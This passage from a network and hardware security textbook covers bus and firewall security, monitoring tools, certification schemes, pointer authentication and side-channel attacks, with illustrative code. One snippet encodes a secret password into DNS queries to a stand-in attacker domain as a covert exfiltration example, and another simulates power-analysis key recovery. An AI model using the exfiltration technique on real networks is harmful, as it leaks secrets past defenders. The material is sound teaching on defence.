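        msg = can_id.to_bytes(2, "big") + counter.to_bytes(4, "big") + data
        tag = hmac.new(KEY, msg, hashlib.sha256).digest()[:4]   # truncated MAC
        return data + tag          # the counter thwarts replay of old frames

    frame = authed_frame(0x120, b"\x01\x02", counter=42)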
Many of the observed problems generalize beyond CAN to any bus system or even shared-
medium network. Rogue components on a bus can suppress messages by invalidating them,
anyone on a bus can see all messages, and there is no built-in protection against spoofing.
Physical separation and segmentation of bus networks remains one of the key concepts to
securing them. In addition, to add security guarantees to insecure bus protocols, we sometimes
see complete protocol overhauls that typically break backward compatibility. For example, the
insecure Modbus standard from 1979 [1736] has had a secure alternative since 2018 (the Modbus/TCP Security Protocol [1794]), which wraps bus messages in TLS-protected channels.
19.4.1 Firewalling
Firewalls can be co-located with routers or implemented as specialised servers. In either case,
they are gatekeepers, inspecting all incoming/outgoing traffic. Firewall systems are typically
configured as bastion hosts, i.e., minimal systems hardened against attacks. They apply traffic
filters based on a network’s security policy and treat all network packets accordingly. The
term filter is used for a set of rules configured by an administrator to inspect a packet and
perform a matching action, e.g., let the packet through, drop the packet, drop and generate
a notification to the sender via ICMP messages. Packets may be filtered according to their
source and destination network addresses, protocol type (TCP, UDP, ICMP), TCP or UDP
source/destination port numbers, TCP Flag bits (SYN/ACK), rules for traffic from a host or
leaving the network via a particular interface, and so on. Traditionally, firewalls were pure packet filters, which inspected header fields only. By now, firewalls can also be stateful, i.e., they retain state information about flows and can map packets to streams. While stateful firewalls allow monitoring of related traffic and can map communication to flows, this comes at the cost of maintaining (possibly lots of) state.
Rule State Src IP Src Port Dst IP Dst Port Proto Action
#1 NEW 172.16.0.0/24 * * 80, 443 TCP ACCEPT
#2 NEW * * 172.16.20.5 22 TCP ACCEPT
#3 ESTABLISHED * * * * TCP ACCEPT
#4 * * * * * * DROP
Figure 19.6: Firewalling example. Rule #1 allows outgoing HTTP(S), rule #2 allows incoming
SSH.
Figure 19.6 shows a simple example firewall configuration. All internal hosts (here, in network
172.16.0.0/24) are allowed to communicate to TCP ports 80/443 for HTTP/HTTPS to
external hosts (rule #1). External hosts can connect to an internal SSH server via TCP on port
22 (rule #2). All follow-up communication of these connections is granted (rule #3). Any other
communication is dropped (rule #4). In reality, firewall configurations can become considerably more complex than this minimal example. Specifying complete and coherent policies is typically hard. It usually helps to first lay out a firewall decision diagram, which is then—ideally automatically—translated into concrete, functionally equivalent firewall policies [1795]. Tools like Firewall Builder [1796] or Capirca [1797] can assist in this process.
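To illustrate the first-match semantics and the role of rule #3's connection state, a toy evaluator for the rules of Figure 19.6 might look as follows (real firewalls additionally track flows to decide what counts as ESTABLISHED; the test addresses are illustrative):

    import ipaddress

    RULES = [  # (state, src_net, dst_net, dst_ports, action) -- first match wins
        ("NEW", "172.16.0.0/24", None, {80, 443}, "ACCEPT"),    # rule #1
        ("NEW", None, "172.16.20.5/32", {22}, "ACCEPT"),        # rule #2
        ("ESTABLISHED", None, None, None, "ACCEPT"),            # rule #3
        (None, None, None, None, "DROP"),                       # rule #4
    ]

    def decide(src: str, dst: str, dport: int, state: str) -> str:
        for r_state, r_src, r_dst, r_ports, action in RULES:
            if r_state not in (None, state):
                continue
            if r_src and ipaddress.ip_address(src) not in ipaddress.ip_network(r_src):
                continue
            if r_dst and ipaddress.ip_address(dst) not in ipaddress.ip_network(r_dst):
                continue
            if r_ports and dport not in r_ports:
                continue
            return action
        return "DROP"

    print(decide("172.16.0.5", "198.51.100.1", 443, "NEW"))   # ACCEPT (rule #1)
    print(decide("203.0.113.9", "172.16.0.5", 25, "NEW"))     # DROP (rule #4)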
Application Gateway (AG): Application gateways, aka application proxies, perform access control and can thus enforce additional requirements such as user authentication before a session is admitted. These AGs can also inspect content at the application layer, unless it is fully
encrypted. In a typical setting, the application gateway will use a firewall’s services after
performing authentication and policy enforcement. A client wanting to access an external
service would connect to the AG first. The AG would prompt them for authentication before
initiating a session to the external server. The AG would now establish the connection with
the destination acting as a relay on behalf of the client, essentially creating two sessions like
a PITM. Another interesting application of an AG is TLS termination. An incoming webserver TLS connection can be terminated at the AG, so that the AG performs the resource-intensive encryption/decryption and passes the unencrypted traffic to the back-end servers. In practice, AGs are also configured to inspect encrypted outbound traffic, with the clients configured to trust corresponding certificates installed at the AG.
Circuit-level Gateway (CG): A CG is a proxy that functions as a relay for TCP connections,
thus allowing hosts from a corporate Intranet to make TCP connections over the Internet. CGs
are typically co-located with a firewall. The most widely used CG today is SOCKS. For end user
applications, it runs transparently as long as the hosts are configured to use SOCKS in place
of a standard socket interface. A CG is simple to implement compared to an AG, as it does
not need to understand application layer protocols.
DMZ: Careful network design places firewalls at the boundaries of network segments. Typically, a Demilitarised Zone (DMZ) (aka a perimeter network) is created. External untrusted users are restricted to using only the services available in this zone. Typically, an organisation's public web server and authoritative DNS would reside in the DMZ. The rest of the network is partitioned into several security zones by a security architect. For example, a payment database would be deployed to an isolated network, as would an internal file server.
hosts to locations. Having said this, unless augmented with the corresponding key material, these forensic tools are limited to analysing non-secure communication.
Network scans allow network administrators to enumerate hosts and services within their
network (or, optionally, the entire Internet). There are numerous tools such as Nmap [1816] or
Zmap [1767] that can send, e.g., ICMP and SYN probes at scale.
IP telescopes are publicly reachable network ranges that do not host any service or client.
Given these networks are still routed, though, one can monitor any traffic sent to them and
derive interesting observations. For example, IP telescopes help to observe network scans by others [1817]. Similarly, they allow defenders to spot backscatter [1818], i.e., responses to traffic that attackers have provoked when using the telescope's IP addresses in IP spoofing attacks (e.g., when assigning random source IP addresses during SYN floods).
Honeypots are systems used by defenders to trap attackers. They are intentionally vulnerable
yet well-isolated client or server systems that are exposed to attackers. There is a wide diversity
of client-side honeypots (e.g., to emulate browser vulnerabilities [1819]) and server-side hon-
eypots (e.g., to emulate service vulnerabilities [1820, 1821], or to attract DDoS attacks [1822]).
Observing the techniques attackers use to exploit these honeypots gives valuable insights
into tactics and procedures.
Network reputation services can help to assess the trustworthiness of individual network
entities such as IP addresses or domain names. Based on past behaviour observed from
an entity, these mostly commercial providers publish a score that serves as reputation for
others. Identifying badly reputed hosts in network traffic can help to detect known attackers
or connections to botnets. Reputation services are, however, limited in coverage and accuracy
due to the volatile domain and IP address usage of attacking hosts.
Finally, Security Information and Event Management (SIEM) systems collect events from
security-critical sensors (e.g., IDS, firewalls, host-based sensors, system log files). A SIEM
system then analyses these events to distill and raise security-critical incidents for further
inspection. It is particularly the combination of multiple data sources (system log files, host-
based anomaly sensors, firewall or IDS events) that makes SIEM so successful in detecting,
e.g., brute force attacks, worm propagations, or scans.
Spanning Tree Algorithm (SPTA) for topology updates. In a DoS attack, an adversary could
advertise a fake link and force the SPTA to block legitimate ports. Similarly, being in a central
position, SDN controllers can be the target of DoS attacks [1825]. Furthermore, Hong et al. [1826]
provide a number of attack vectors on practical SDN switch implementations. SDN switches
are also prone to a timing side channel attack [1827]. For example, attackers can send a packet
and measure the time it takes the switch to process this packet. For a new packet, the switch
will need to fetch a new rule from the controller, thus resulting in additional delay over the
flows that already have rules installed at the switch. Consequently, the attacker can determine
whether an exchange between an IDS and a database server has taken place, or whether a
host has visited a particular website. A possible countermeasure would introduce delay for
the first few packets of every flow even if a rule exists [1828]. A more extensive analysis of
SDN vulnerabilities in general can be found in a study by Zerkane et al. [1829].
Network Functions Virtualisation (NFV) aims to reduce capital expenditure (CAPEX) and allow for the rapid intro-
duction of new services to the market. Specialised network middleboxes such as firewalls,
encoders/decoders, DMZs and deep packet inspection units are typically closed black box
devices running proprietary software [1830]. NFV researchers have proposed the deployment
of these middleboxes entirely as virtualised software modules and managed via standard-
ised and open APIs. These modules are called Virtual Network Functions (VNFs). A large
number of possible attacks concern the virtual machine hypervisor as well as the configuration of virtual functions. Lal et al. [1831] provide a table of NFV security issues and best practices
for addressing them. For example, an attacker can compromise a VNF and spawn other
new VNFs to change the configuration of a network by blocking certain legitimate ports. The
authors suggest hypervisor introspection and security zoning as mitigation techniques. Yang
et al. [1832] provide a comprehensive survey on security issues in NFV.
19.5 CONCLUSION
[1733, c5] [1735, c8,c11] [1732, c6]
beyond this KA. A great starting point for further reading is Ivancic's security analysis of delay-tolerant networks [1842].
Network Covert Channels: Network covert channels aim to hide the very existence of communication, e.g., using steganography. They allow two or more collaborating attacker processes to leak sensitive information despite network policies that should prevent such leakage. For example, attackers may encode sensitive information in TCP headers in a way that remains unnoticed by an IDS [1843]. Similar covert channels are possible for other protocols, such as DNS [1844] or IP [1845]. Covert channels can be confined by carefully modelling and observing all protocol fields, or patterns in general, that could be abused for hiding information [1846].
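As an illustration of how simple such channels can be, the sketch below encodes secret bytes into DNS labels queried under an attacker-controlled domain (a hypothetical name); the attacker's authoritative server merely has to log incoming queries:

    import base64

    def exfil_queries(secret: bytes, domain: str = "attacker.example"):
        encoded = base64.b32encode(secret).decode().rstrip("=").lower()
        chunks = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]  # 63-char labels
        return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

    for name in exfil_queries(b"db-password=hunter2"):
        print(name)     # each name would simply be resolved by the insider host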
Payment Networks: The banking sector maintains its own proprietary standards and network protocols. Exploring those in detail goes beyond the scope of this document, particularly because protocols can even be specific to certain regions (e.g., FinTS in Germany) or special purposes (e.g., 3-D Secure for securing credit card transactions). The rise of digital currencies such as Bitcoin, which implement several protocols of their own, adds further complexity. Finally,
stock exchanges nowadays heavily depend on reliable networks and are extremely sensitive to timing attacks, which requires careful Quality-of-Service assurances [1847, 1848].
Physical-Layer Security: Our security analyses stopped at the logical part of the link layer.
The physical part of this layer deserves further attention and indeed is a subject on its own. In
fact, we witnessed several recent advancements in this field, such as Bluetooth Low Energy,
distance bounding and positioning protocols, Near-Field Communication (NFC) or cellular
networks. For a detailed treatment of this subject, we refer to the Physical Layer and Telecom-
munications Security Knowledge Area (Chapter 22).
Networking Infrastructure Security: We have so far assumed that networking components are
fully trusted. However, with global supply chains that involve dozens of parties and countries
during the manufacturing of a component, such an assumption may easily be invalidated in practice.
What happens if network infrastructure, which often is part of critical infrastructures, cannot
be trusted, e.g., due to backdoors or software vulnerabilities? Answering this question is far
from trivial, as it depends on which components and which security guarantees are at stake.
One recent real-world example of such an analysis arises in 5G networks, where some countries ban hardware delivered by certain other countries, simply because of a lack of trust. This quickly turns into a non-networking issue that finds its solutions in other chapters,
such as in the Software Security Knowledge Area (Chapter 15), the Secure Software Lifecycle
Knowledge Area (Chapter 17) or Hardware Security Knowledge Area (Chapter 20). Discussing
non-trustworthy networking components goes beyond the scope of this chapter.
Cross-Border Regulations: Networks that span several countries, and thus several legislations, are quite interesting from a legal perspective. There may be conflicts of law, e.g., regarding patents, export restrictions, or simply the question of whether or not a digital signature is legally binding.
These topics are addressed in depth in the Law & Regulation Knowledge Area (Chapter 3).
Cross-reference of topics vs reference material ([1733], [1734], [1735], [1732], [1731]):
19.1 Security Goals and Attacker Models c8 c1 c1 c6 c8
19.2 Networking Applications c1 c1
19.3.1 Security at the Application Layer c8 c6,c15,c19–c22 c8
19.3.2 Security at the Transport Layer c8 c4,c6 c8
19.3.3 Security at the Internet Layer c8 c5,c9 c17 c8
19.3.4 Security on the Link Layer c8 c7 c8
19.4 Network Security Tools c8 c5,c8,c11,c12 c23 c6 c8
19.5 Conclusion c5 c8,c11 c6
20 HARDWARE SECURITY
INTRODUCTION
Hardware security covers a broad range of topics from trusted computing to Trojan circuits. To
classify these topics we follow the different hardware abstraction layers as introduced by the Y-
chart of Gajski & Kuhn. The different layers of the hardware design process will be introduced
in section 20.1. It is linked with the important concept of a root of trust and associated
threat models in the context of hardware security. Next follows section 20.2 on measuring
and evaluating hardware security. The next sections gradually reduce the abstraction level.
Section 20.3 describes secure platforms, i.e. a complete system or system-on-chip as trusted
computing base. Next, section 20.4 covers hardware support for software security: which features a programmable processor should include to support software security. This section
is closely related to the Software Security Knowledge Area (Chapter 15). Register transfer
level is the next abstraction level down, covered in section 20.5. The focus at this level is typically
the efficient and secure implementation of cryptographic algorithms so that they can be
mapped on ASIC or FPGA. This section is closely related to the Cryptography Knowledge
Area (Chapter 10). All implementations also need protection against physical attacks, most
importantly against side-channel and fault attacks. Physical attacks and countermeasures are
described in section 20.6. Section 20.7 describes entropy sources at the lowest abstraction
level, close to CMOS technology. It includes the design of random number generators and
physically unclonable functions. The last technical section describes aspects related to the
hardware design process itself. This chapter ends with the conclusion and an outlook on
hardware security.
[Figure: the physical domain of the Gajski-Kuhn Y-chart, ranging from transistor layout, cell layout and module layout to floorplans and physical partitions.]
side-channel leakage into account the attacker has the algorithm level information as well as
the extra timing, power, electro-magnetic information as observable from the outside of the
chip. Thus the attacker model moves from black box to gray box. It is still assumed that the
attacker does not know the details of the internals, e.g. the contents of the key registers.
Example 3: for programmable processors, the interface between hardware and software is traditionally considered to be the Instruction Set Architecture (ISA). The ISA is what is visible to the software programmer, and the implementation of the ISA is left to the hardware designer. The ISA used to be considered the trust boundary for the software designer. Yet, with the discovery of micro-architectural side-channel attacks, such as Spectre, Meltdown and Foreshadow, this ISA model is no longer a black box, as micro-architectural information and leakage are also available to the attacker [1851].
20.1.4 Root of trust, threat model and hardware design abstraction layers
Abstraction level | Root of trust – functionality | Structural (how) – examples | Example threats | Typical HW design activities
System and application | Secure platforms: isolation, integrity, attestation, ... | e.g. Trusted Execution (TrustZone, SGX, TEE), HSM, Secure Element | – | security application development
Processor (general purpose) | – | e.g. shadow stack | SW vulnerabilities | ISA, HW/SW co-design
Processor (domain specific) | Crypto specific | – | Timing attacks | Constant number of clock cycles
Register Transfer (RTL) | Crypto specific | Building blocks | Side-channel attack | Logic synthesis
Logic | Resistance to SCA: power, EM, fault | Masking, circuit styles | Side-channel attack, fault | FPGA tools, standard cell design
Circuit and technology | Source of entropy | TRNG, PUF, secure SRAM | Temperature, glitches | SPICE simulations
Physical | Tamper resistance | Shields, sensors | Probing, heating | Layout activities
Table 20.1: Design abstraction layers linked to threat models, root of trust and design activities
are added to address these software vulnerabilities, such as a shadow stack or measures
to support hardware control flow integrity. Domain specific processors typically focus on
a limited functionality. They are typically developed as co-processors in larger systems-on-
chip. Typical examples are co-processors to support public key or secret key cryptographic
algorithms. Time at the processor level is typically measured in instruction cycles.
Both general purpose and domain specific processors are composed of computational units (multipliers and ALUs), memory and interconnect. These modules are typically
described at the register transfer level: constant-time and resistance against side-channel
attacks become the focus. Time at this level is typically measured in clock cycles.
Multipliers, ALUs, memories, interconnect and bus infrastructure are created from gates
and flip-flops at the logic level. At this design abstraction level, focus is on leakage through
physical side-channels, power, electro-magnetic, and fault attacks. Time is typically measured
in absolute time (nsec) based on the available standard cell libraries or FPGA platforms.
The design of entropy sources requires knowledge and insights into the behavior of transistors
and the underlying Complementary Metal-Oxide-Semiconductor (CMOS) technology. The de-
sign of these hardware security primitives is therefore positioned at the circuit and transistor
level. Similarly, the design of sensors and shields against physical tampering requires insight into the technology. At the circuit and technology level, time is measured in absolute terms, e.g.
nsec delay or GHz clock frequency.
Table 20.1 does not aim to be complete. The idea is to illustrate each abstraction layer
with an example. In the next sections, the hardware security goals and their associated threat
models will be discussed in detail in relation to and relevance for each abstraction layer.
20.2.1 FIPS140-2
FIPS140-2 is a US NIST standard used for the evaluation of cryptographic modules. FIPS140-2
defines security levels from 1 to 4 (1 being the lowest). The following gives a description of the
four levels from a physical hardware security point of view. Next to the physical requirements,
there are also roles, services and authentication requirements (for more details see [1852]
and other KAs).
Security level 1 only requires that an approved cryptographic algorithm be used, e.g. AES or SHA-3, but does not impose physical security requirements. Hence, a software implementation could meet level 1. Level 2 requires a first level of tamper evidence. Level 3 also requires tamper evidence, but on top requires tamper resistance.
NIST defines tampering as an intentional but unauthorized act resulting in the modification of a system, components of systems, its intended behavior, or data [1853].
Tamper evidence means that there is a proof or testimony that tampering with a hardware
module has happened. E.g. a broken seal indicates that a device was opened. A light sensor
might observe that the lid of a chip package was lifted.
Tamper resistance means that on top of tamper evidence, protection mechanisms are added
to the device. E.g. by extra coating or dense metal layers, it is difficult to probe the key registers.
Level 4 increases the requirements such that the cryptographic module can operate in physi-
cally unprotected environments. In this context, physical side-channel attacks pose an important threat: if the timing, power consumption or electro-magnetic radiation of the device depends on the sensitive data being processed, information is leaked. Since the device is under normal operation, a classic tamper evidence mechanism will not realize that the device is under attack. See section 20.6.
to EAL1, up to a formally verified and tested design, corresponding to the highest level EAL7. CC
further subdivides the process of evaluation into several classes, where most of the classes
verify the conformity of the device under test. The 5th class (AVA) deals with the actual
vulnerability assessment. It is the most important class from a hardware security viewpoint
as it searches for vulnerabilities and associated tests. It assigns a rating to the difficulty of executing the test, called the identification, and to the possible benefit an attacker can gain from the penetration, called the exploitation. The difficulty is a function of the time required
to perform the attack, the expertise of the attacker (from layman to multiple experts), how much knowledge of the device is required (from simple public information to detailed hardware source code), the number of samples required, and the cost and availability of equipment to
perform the attack, etc. A high difficulty level will result in a high score and a high level of the
AVA class. The highest score one can obtain is an AVA level of 5, which is required to obtain a
top EAL score.
Its usage is well established in the field of smartcards and secure elements as they are used in telecom, financial and government ID applications. It is also used in the field of Hardware Security Modules, Trusted Platform Modules and more [1854]. For certain classes of applications, minimum sets of requirements are defined in protection profiles. There exist protection profiles for Trusted Platform Modules (TPMs), Javacards, biometric passports, SIM cards, secure elements, etc.
Since certification comes from one body, there exist agreements between countries so that
the certifications in one country are recognized in other countries. As an exception, EMVCo is a private organization that sets the specifications for worldwide interoperability of payment
transactions. It has its own certification procedure similar to CC.
Please note that the main purpose of a Common Criteria evaluation is to verify that an IT product
delivers the claims promised in the profile. It does not mean that there are no vulnerabilities
left. A good introduction to the topic can be found in [1855] and a list of certified products on
[1854].
protection profiles exist depending on the application domain: financial, automotive, pay-TV, etc.
A typical embedded secure element is one integrated circuit with no external components. It
consists of a small micro-controller with cryptographic co-processors, secure volatile and
non-volatile storage, TRNG, etc. I/O is usually limited, through a specific set of pins, or through
an NFC wireless connection. Building a secure element is a challenge for a hardware designer,
as one needs to combine security with non-security requirements of embedded circuits: small
form factor (no external memory), low power and/or low energy consumption in combination
with tamper resistance and resistance against physical attacks, such as side-channel and
fault attacks (see section 20.6).
tion, the hardware support could be limited to only machine level support. Memory protection
could be added as an optional hardware module to the processor.
Other more advanced security objectives to support software security might include:
• Sealed storage is the process of wrapping code and/or data with certain configuration,
process or status values. Only under the correct configuration (e.g. program counter
value, nonce, secret key, etc.) can the data be unsealed. Dynamic root of trust in combi-
nation with a late launch guarantees that even if the processor starts from an unknown
state, it can enter a fixed known piece of code and known state. This typically requires
special instructions to enter and exit the protected partition.
• Memory protection refers to the protection of data when it travels between the processor
unit and the on-chip or off-chip memory. It protects against bus snooping or side-channel
attacks or more active fault injection attacks.
• Control flow integrity is a security mechanism to prevent malware attacks from redirect-
ing the flow of execution of a program. In hardware, the control flow of the program is
compared on-the-fly at runtime with the expected control flow of the program.
• Information flow analysis is a security mechanism to follow the flow of sensitive data
while it travels through the different components, from memory to cache over multiple
busses into register files and processing units and back. This is important in the context
of micro-architectural and physical side-channel attacks.
In the next subsections, a representative set of hardware approaches to address the above software security challenges is presented. Some hardware techniques address multiple se-
curity objectives. Some are large complex approaches, others are simple dedicated hardware
features.
As a side note: a large body of knowledge on software-only approaches is available in literature.
Mostly, they offer a weaker level of security as they are not rooted in a hardware root of trust.
E.g. for control flow integrity, software-only approaches might instrument the software code
to check branches or jumps, while hardware support might calculate MACs on the fly and
compare these to stored associated MACs.
the IC can be split into a trusted and a rich part, i.e. the processor core, the crypto accelerators,
the volatile and non-volatile memory are all split. Option 2 assumes that there is a separate
secure co-processor area on the SoC with a well-defined hardware interface to the rest of the
SoC. Option 3 assumes a dedicated off-chip secure co-processor, much like a secure element.
GlobalPlatform also defines a Common Criteria based protection profile (see section 20.2.2)
for the TEE. It assumes that the package of the integrated circuit is a black box [1861] and
thus secure storage is assumed by the fact that the secure asset remains inside the SoC. It
follows the procedures of common criteria assurance package EAL2 with some extra features.
It pays extra attention to the evaluation of the random number generator and the concept of
monotonic increasing time.
The authentication code relies on cryptographic primitives. A challenge for these algorithms
is that they should create the authentication tag with very low latency to fit into the critical
path of a microprocessor. The ARMv8-A architecture therefore uses a dedicated low-latency crypto algorithm, QARMA [1866]. In this approach, the unused bits in a 64-bit pointer are used
to store a tag. This tag is calculated based on a key and on the program state, i.e. current
address and function. These tags are calculated and verified on the fly.
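The overall idea (not ARM's actual QARMA-based implementation) can be sketched as follows, assuming 48-bit virtual addresses so that the top bits of a pointer are free to hold a tag; the key, tag width and HMAC primitive below are illustrative stand-ins:

    import hmac, hashlib

    KEY = b"per-process-key"              # assumed per-process secret
    TAG_BITS, ADDR_BITS = 16, 48          # assume 48-bit virtual addresses

    def sign(ptr: int, context: int) -> int:
        msg = ptr.to_bytes(8, "little") + context.to_bytes(8, "little")
        mac = hmac.new(KEY, msg, hashlib.sha256).digest()
        tag = int.from_bytes(mac[:TAG_BITS // 8], "little")
        return (tag << ADDR_BITS) | ptr   # tag rides in the unused upper bits

    def auth(signed: int, context: int) -> int:
        ptr = signed & ((1 << ADDR_BITS) - 1)
        if sign(ptr, context) != signed:
            raise ValueError("pointer authentication failed")  # corrupted pointer
        return ptr

    p = sign(0x7f00_dead_beef, context=1)
    assert auth(p, context=1) == 0x7f00_dead_beef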
Address Space Layout Randomization and stack canaries are general software techniques: their aim is to make it hard to predict the destination address of a jump. A detailed description
can be found in the Software Security Knowledge Area (Chapter 15).
decide to go for serial or parallel architectures, making use of multiple design tricks to match
the design with the requirements. The most well-known tricks are to use pipelining to increase
throughput, or unrolling to reduce latency, time multiplexing to reduce area, etc.
From an implementation viewpoint, at this register transfer abstraction level, a large body of knowledge and a large set of Electronic Design Automation (EDA) tools exist to map an application onto an FPGA or ASIC platform [1849]. Implementation results should be compared
not only on the number of operations, but also on memory requirements (program memory
and data memory), throughput and latency requirements, energy and power requirements,
bandwidth requirements and the ease with which side-channel and fault attack countermea-
sures can be added. Please note that this large body of knowledge exists for implementations
that focus on efficiency. However, when combining efficiency with security requirements, such
as constant time execution or other countermeasures, there is a huge lack of supporting EDA
tools (see section 20.8).
is however limited as hash algorithms are recursive algorithms and thus there is an
upper bound on the amount of pipelining that can be applied [1869]. Cryptocurrencies
form part of the more general technology of distributed ledgers, which is discussed in
the Distributed Systems Security Knowledge Area (Chapter 12).
• The computational complexity of public key algorithms is typically 2 or 3 orders of magnitude higher than that of secret key algorithms, and thus their implementations are 2 to 3 orders of magnitude slower or larger. Especially for RSA and elliptic curve implementations, a large body of knowledge is available, ranging from compact [1870] to fast, for classic and newer curves [1871].
• Algorithms resistant to attacks of quantum computers, aka post-quantum secure algo-
rithms, are the next generation algorithms requiring implementation in existing CMOS
ASIC and FPGA technology. Computational bottlenecks are the large multiplier struc-
tures, with/without the Number Theoretic Transform, the large memory requirements
and the requirements on random numbers that follow specific distributions. Currently,
NIST is holding a competition on post-quantum cryptography [1872]. Thus it is expected
that after the algorithms are decided, implementations in hardware will follow.
• Currently, the most demanding implementations for cryptographic algorithms are those
used in homomorphic encryption schemes: the computational complexity, the size of
the multipliers and especially the large memory requirements are the challenges to
address [1873].
20.6.1 Attacks
At the current state of knowledge, cryptographic algorithms have become very secure against
mathematical and cryptanalytical attacks: this is certainly the case for algorithms that are
standardized or that have received an extensive review in the open research literature. Cur-
rently, the weak link is mostly the implementation of algorithms in hardware and software.
Information leaks from the hardware implementation through side-channel and fault attacks.
A distinction is made between passive or side-channel attacks versus active or fault attacks.
A second distinction can be made based on the distance of the attacker to the device: attacks
can occur remotely, close to the device but still non-invasively, or as actual invasive attacks. More
details on several classes of attacks are below.
Passive Side Channel Attacks General side-channel attacks are passive observations of a
compute platform. Through data dependent variations of execution time, power consumption
or electro-magnetic radiation of the device, the attacker can deduce information about secret
internals. Variations of execution time, power consumption or electro-magnetic radiations
are typically picked up in close proximity of the device, while it is operated under normal
conditions. It is important to note that the normal operation of the device is not disturbed.
Thus the device is not aware that it is being attacked, which makes this attack quite powerful
[980].
Side channel attacks based on variations on power consumption have been extensively
studied. They are performed close to the device with access to the power supply or the power
pins. One makes a distinction between Simple Power Analysis (SPA), Differential and Higher
Order Power Analysis (DPA), and template attacks. In SPA, the idea is to first study the target
for features that depend on the key. E.g. a typical target in timing and power attacks is an if-then-else branch that is dependent on key bits. In public key algorithm implementations,
such as RSA or ECC, the algorithm runs sequentially through all key bits. When the if-branch
takes more or less computation time than the else-branch this can be observed from outside
the chip. SPA attacks are not limited to public key algorithms, they have also been applied to
secret key algorithms, or algorithms to generate prime numbers (in case they need to remain
secret). So, with knowledge of the internal operation of the device, SPA only requires the collection of one or a few traces for analysis.
With DPA, the attacker collects multiple traces, ranging from a few tens for unprotected
implementations to millions in case of protected hardware implementations. In this situation,
the attacker exploits the fact that the instantaneous power consumption depends on the
data that is processed. The same operation, depending on the same unknown sub-key, will
result in different power consumption profiles if the data is different. The attacker will also build a statistical model of the device to estimate the power consumption as a function of the data and the different values of the subkey. Statistical analysis of these traces, based on correlation analysis, mutual information and other statistical tests, is applied to correlate the measured values with the statistical model.
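The statistical core of such an attack can be sketched with synthetic data: correlate the traces against a Hamming-weight model for each subkey guess and pick the best-correlating one (here, a random permutation stands in for the real AES S-box, and the leakage is simulated):

    import numpy as np

    SBOX = np.random.RandomState(0).permutation(256)   # stand-in for AES's S-box
    hw = np.array([bin(x).count("1") for x in range(256)])   # Hamming weights

    true_key = 0x3A
    pt = np.random.randint(0, 256, 5000)                     # known plaintexts
    traces = hw[SBOX[pt ^ true_key]] + np.random.normal(0, 1, 5000)  # leak + noise

    best = max(range(256),
               key=lambda k: abs(np.corrcoef(hw[SBOX[pt ^ k]], traces)[0, 1]))
    print(hex(best))    # 0x3a: the correct guess correlates strongest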
Side channel attacks based on Electro-Magnetic radiations have been recognized early-on
in the context of military communication and radio equipment. As a reaction, NATO and the
governments of many countries have issued TEMPEST [1874]. It consists of specifications on
the protection of equipment against unintentional electro-magnetic radiation but also against
leakage of information through vibrations or sound. Electro-Magnetic radiation attacks can
be mounted from a distance, as explained above, but also at close proximity to the integrated
circuit. Electro-Magnetic probing on top of an integrated circuit can release very localized
information of specific parts of an IC by using a 2D stepper and fine electro-magnetic probers.
Thus electro-magnetic evaluation has the possibility to provide more fine grained leakage
information compared to power measurements.
Timing attacks are another subclass of side-channel attacks [1453]. When the execution time
of a cryptographic calculation or a program handling sensitive data, varies as a function of the
sensitive data, then this time difference can be picked up by the attacker. A timing attack can
be as simple as a key dependent different execution time of an if-branch versus an else-branch
in a finite state machine. Cache attacks, which abuse the time difference between a cache hit
and a cache miss, are an important class of timing attacks [1875, 1876].
With a template attack, the attacker will first create a copy or template of the target device
[1877]. This template is used to study the behavior of the device for all or a large set of inputs
and secret data values. One or a few samples of the target device are then compared to the
templates in the database to deduce secret information from the device. Template attacks
are typically used when the original device has countermeasures against multiple executions.
E.g. it might have an internal counter to log the number of failed attempts. Templates can be
20.6.2 Countermeasures
There are no generic countermeasures that resist all classes of side-channel attacks. De-
pending on the threat model (remote/local access, passive/active, etc.) and the assumptions
made on the trusted computing base (i.e. what is and what is not included in the root of trust),
countermeasures have been proposed at several levels of abstraction. The most important
categories are summarized below.
To resist timing attacks, the first objective is to provide hardware that executes the application
or program in constant time, independent of secret inputs, keys and internal state. Depending
on the time granularity of the attacker's measurement equipment, constant-time counter-
measures also need to be correspondingly fine-grained. At the processor architecture level,
constant time means a constant number of instructions. At the RTL level, constant time means
a constant number of clock cycles. At the logic and circuit level, constant time means a
constant logic depth or critical path independent of the input data. At the instruction level,
constant time can be obtained by balancing execution paths and adding dummy instructions.
Sharing of resources, e.g., through caches, makes constant-time implementations extremely
difficult to obtain.
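At the software level, the branch-balancing idea can be illustrated by rewriting the early-exit comparison shown earlier without data-dependent branches. This is only a sketch: as the next paragraph notes for hardware, compilers may transform such code, so real constant-time guarantees must be verified on the target platform.

    #include <stddef.h>

    /* Branch-free comparison: every byte is always inspected and only
       bitwise operations are used, so the execution time no longer
       depends on where (or whether) the inputs differ. */
    int ct_compare(const unsigned char *a, const unsigned char *b, size_t len) {
        unsigned char diff = 0;
        for (size_t i = 0; i < len; i++)
            diff |= (unsigned char)(a[i] ^ b[i]);
        return diff == 0;        /* 1 if equal, 0 otherwise */
    }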
At the RTL level, we need to make sure that all instructions run in the same number of clock
cycles, which can be achieved by inserting dummy operations or dummy gates, depending
on the granularity level. Providing constant-time RTL-level and gate-level descriptions is,
however, a challenge, as design tools, both hardware and software compilers, will for
performance reasons synthesise away the dummy operations or logic that were added to
balance the computations.
As many side-channel attacks rely on a large number of observations or samples, randomisa-
tion is a popular countermeasure. It is used to protect against power, electro-magnetic and
timing side-channel attacks. Randomisation is a technique that can be applied at the algorithm
level: it is especially popular for public-key algorithms, which apply techniques such as scalar
blinding or message blinding [1885]. Randomisation applied at the register-transfer and gate
level is called masking. Masking schemes randomise intermediate values in the calculations so
that their power consumption can no longer be linked with the internal secrets. A large set of
papers on gate-level masking schemes is available, ranging from simple Boolean masking
to threshold implementations that are provably secure under certain leakage models [1886].
Randomisation has been effective in practice, especially as a protection measure for public-key
implementations. The protection of secret-key algorithms by masking is more challenging:
some masking schemes require a huge amount of random numbers, while others assume
leakage models that do not always correspond to reality. In this context, novel cryptographic
techniques, summarised under the label of leakage-resilient cryptography, are being developed
that are inherently resistant to side-channel attacks [1887, 1888]. At this stage, there is still a
gap between theory and practice.
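The principle of Boolean masking can be sketched in a few lines of C: a secret byte is split into two random shares, and linear (XOR) operations are computed share-wise, so that no individual intermediate variable is correlated with the secret. This is a first-order illustration only; non-linear operations (e.g., AND) require more elaborate schemes such as the threshold implementations cited above, and the mask source must be a proper random number generator.

    #include <stdint.h>
    #include <stdlib.h>

    /* First-order Boolean masking sketch: a secret byte is never handled
       directly but split into two shares (m, secret XOR m), each of which
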